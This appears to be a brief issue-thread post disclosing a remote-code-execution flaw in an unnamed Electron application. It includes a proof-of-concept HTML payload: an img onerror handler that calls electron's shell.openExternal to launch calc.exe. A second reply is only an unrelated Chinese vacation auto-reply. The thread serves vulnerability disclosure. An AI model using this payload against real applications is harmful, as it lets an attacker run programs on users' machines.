This software was found to have an RCE vulnerability.

[LuckyT0mat0]

This software was found to have an RCE vulnerability.
Please be careful not to insert the initialization link easily.

exp(1.html):
<img/src=x onerror="try{ const {shell} = require('electron'); shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">

[jiahe007]

这是来自QQ邮箱的假期自动回复邮件。   您好，我最近正在休假中，无法亲自回复您的邮件。我将在假期结束后，尽快给您回复。